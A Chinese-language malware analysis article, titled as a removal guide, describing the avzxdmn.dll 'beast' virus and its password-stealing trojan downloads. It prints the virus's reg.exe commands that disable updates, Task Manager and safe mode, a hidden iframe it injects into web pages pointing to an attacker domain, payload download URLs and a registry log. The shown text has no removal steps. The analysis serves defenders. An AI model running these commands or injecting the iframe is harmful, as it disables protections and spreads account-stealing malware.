avzxdmn.dll病毒清除方法
avzxdmn.dll病毒中毒症状:
最近有很多人中了这个“禽兽”病毒,之所以叫做“禽兽”病毒是因为病毒运行后,文件夹选项中隐藏文件的文字内容被修改成了“禽兽尚且有半点怜悯之心,而我一点没有,所以我不是禽兽。”
这个病毒其实就是原先分析的niu.exe的变种,不过此次变种变化巨大 增加了很多新的“功能”,中毒者在禽兽病毒和其他一些木马的“帮助”下 系统将完全处于无保护的状态.在没有任何工具的情况下 救活系统的可能性几乎为0
avzxdmn.dll病毒的几大罪状如下:
1.破坏安全模式 禁用系统的一些自我保护功能(自动更新,防火墙等)
2.IFEO映像劫持杀毒软件以及常用安全工具
3.禁用任务管理器
4.修改主页
5.关闭带有“杀毒”等字样的窗口
6.感染html等网页文件
7.删除gho文件,使用户无法还原系统
8.U盘传播
9.疯狂下载多种木马和流氓软件(多达20多种木马)
avzxdmn.dll病毒分析:
1.释放如下文件:
%system32%\crsss.exe
在每个分区下面生成autorun.inf 和niu.exe
2.调用reg.exe进行如下操作:
添加自身启动项目
ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D
禁用windows自动更新
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
禁用任务管理器
add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
破坏显示隐藏文件 并将选项名称改为“禽兽尚且有半点怜悯之心,而我一点没有,
所以我不是禽兽”
delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /f
add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v Text /t REG_SZ /d 禽兽尚且有半点怜悯之心,而我一点没有,所以我不是禽兽. /f
破坏安全模式
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
3.向HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\下面添加如下映像劫持项目指向%system32%\crsss.exe(篇幅所限,仅贴图)
不光劫持常见杀毒软件和小工具 还劫持了msconfig.exe regedit.exe等系统常用的辅助工具
4.遍历各个分区删除.GHO文件
5.遍历各个分区的INDEX.ASP,.HTM,INDEX.PHP,DEFAULT.ASP,DEFAULT.PHP,CONN.ASP文件
在其后面加入<IfrAmE src=http://www.1030829.com/0.htm width=0
height=0></IfrAmE>的代码
连接网络
6.连接hxxp://www.1030829.com/pu/tj.asp做感染统计
7.下载hxxp://*.1030829.com/guanjian.txt到%system32%\text1.txt
读取里面的文件内容
并通过GetWindowTextA等函数获得窗口名称 调用PostMessageA发送WM_CLOSE命令
关闭带有text1.txt中所包含的关键字的窗口
测试中text1.txt内容如下
木马
病毒
360
瑞星
卡吧
金山
毒霸
江名
8.下载hxxp://*.1030829.com/suoding.txt到%system32%\d.txt
读取里面的内容(里面是一个网址)
并通过调用reg.exe 执行
add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d
的命令 把IE首页修改成d.txt中的地址
add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f 锁定IE主页
测试中suoding.txt中的内容为www.baidu.com (肯定以后还会变化)
9.下载http://*.1030829.com/down.txt到%system32%文件夹下
读取里面的地址下载木马
http://*.1030829.com/tempA.exe~http://w.1030829.com/tempW.exe
到%system32%文件夹下
盗号木马会盗取包括如下游戏的帐号和密码(包括但不限于)
刀剑
魔兽世界
奇迹世界
完美世界
大话西游II
魔域
问道
诛仙
热血江湖
QQ
...
木马植入完毕以后的sreng日志如下
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\crsss.exe> [N/A]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<KVP><C:\WINDOWS\system32\drivers\svchost.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Windows]
<AppInit_DLLs><rarjbpi.dll> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon]
<UIHost><logonui.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerShellExecuteHooks]
<{4D47B341-43DF-4563-753F-345FFA3157D4}><C:\WINDOWS\system32
\kvmxdma.dll> []
<{3E32FA58-3453-FA2D-BC49-F340348ACCE3}><C:\WINDOWS\system32
\rsmycpm.dll> []
<{3C87A354-ABC3-DEDE-FF33-3213FD7447C3}><C:\WINDOWS\system32
\kvdxcma.dll> []
<{3A1247C1-53DA-FF43-ABD3-345F323A48D3}><C:\WINDOWS\system32
\avwgcmn.dll> []
<{46650011-3344-6688-4899-345FABCD1564}><C:\WINDOWS\system32
\ratbdpi.dll> []
<{14783410-4F90-34A0-7820-3230ACD05F41}><C:\WINDOWS\system32
\raqjapi.dll> []
<{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}><C:\WINDOWS\system32
\rsjzbpm.dll> []
<{4859245F-345D-BC13-AC4F-145D47DA34F4}><C:\WINDOWS\system32
\avzxdmn.dll> []
<{28907901-1416-3389-9981-372178569982}><C:\WINDOWS\system32
\kawdbzy.dll> []
<{2598FF45-DA60-F48A-BC43-10AC47853D52}><C:\WINDOWS\system32
\rarjbpi.dll> []
<{1AB09B3F-A6D0-4B55-B87D-264934EBEAED}><C:\Program Files\Internet
Explorer\PLUGINS\WinSys74.Sys> []
<{A393C2CF-1C26-4309-9765-13B7FDC0F200}><C:\WINDOWS\system32
\mypern0.dll> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\360rpt.exe]
<IFEO[360rpt.exe]><C:\WINDOWS\system32\crsss.exe> [N/A]...
==================================
服务
[Windows dvne RunThem / dvne][Running/Auto Start]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->C:\PROGRA~1
\yqiz\iasj.dll><>
==================================
驱动程序
[acpidisk / acpidisk][Running/Auto Start]
<\??\C:\WINDOWS\system32\drivers\acpidisk.sys><N/A>
==================================
正在运行的进程
[PID: 1756][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation,
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\rarjbpi.dll] [N/A, ]
[C:\WINDOWS\system32\kvmxdma.dll] [N/A, ]
[C:\WINDOWS\system32\rsmycpm.dll] [N/A, ]
[C:\WINDOWS\system32\kvdxcma.dll] [N/A, ]
[C:\WINDOWS\system32\avwgcmn.dll] [N/A, ]
[C:\WINDOWS\system32\ratbdpi.dll] [N/A, ]
[C:\WINDOWS\system32\raqjapi.dll] [N/A, ]
[C:\WINDOWS\system32\rsjzbpm.dll] [N/A, ]
[C:\WINDOWS\system32\avzxdmn.dll] [N/A, ]
[C:\WINDOWS\system32\kawdbzy.dll] [N/A, ]
[C:\Program Files\Internet Explorer\PLUGINS\WinSys74.Sys] [N/A, ]
[C:\WINDOWS\system32\mypern0.dll] [N/A, ]
[C:\WINDOWS\system32\upxdnd.dll] [N/A, ]
[c:\progra~1\yqiz\ldvm.dll] [, 5, 0, 1, 1]
[c:\progra~1\yqiz\qiar.dll] [, 5, 0, 1, 1]
==================================
Winsock 提供者
MSAPI Tcpip [TCP/IP]
C:\WINDOWS\system32\msavp.dll(, N/A)
MSAPI Tcpip [UDP/IP]
C:\WINDOWS\system32\msavp.dll(, N/A)
...
相关文章- ·认识映象劫持技术原理与解决办法
- ·大水牛下载者分析及手工清除办法
- ·计算机病毒中毒症状、预防和系统恢复
- ·mdm.exe专杀以及处理方法
- ·手工清除病毒mdm.exe和RavMon.exe
- ·mdm.exe病毒的解决方法
- ·不再草木皆兵 三招对付捆绑木马!
- ·如何清除Taskmgr.exe病毒
- ·taskmgr.exe进程CPU占用率高的原因
- ·taskmgr.exe系统进程及相关病毒介绍
- ·QQ“缘”病毒taskmgr.exe狂占CPU内存
- ·警惕伪SoundMan.exe病毒 SoundMan.exe病毒清除办法
- ·巧治Vista下U盘自动运行病毒方法
- ·计算机病毒的说明、预防和恢复
- ·病毒反抗杀毒软件主要手段
- ·经典九招 防止自动播放引来病毒
- ·文件关联型木马的特殊化查杀
- ·SVCHOST.EXE病毒清除及专杀工具
发表评论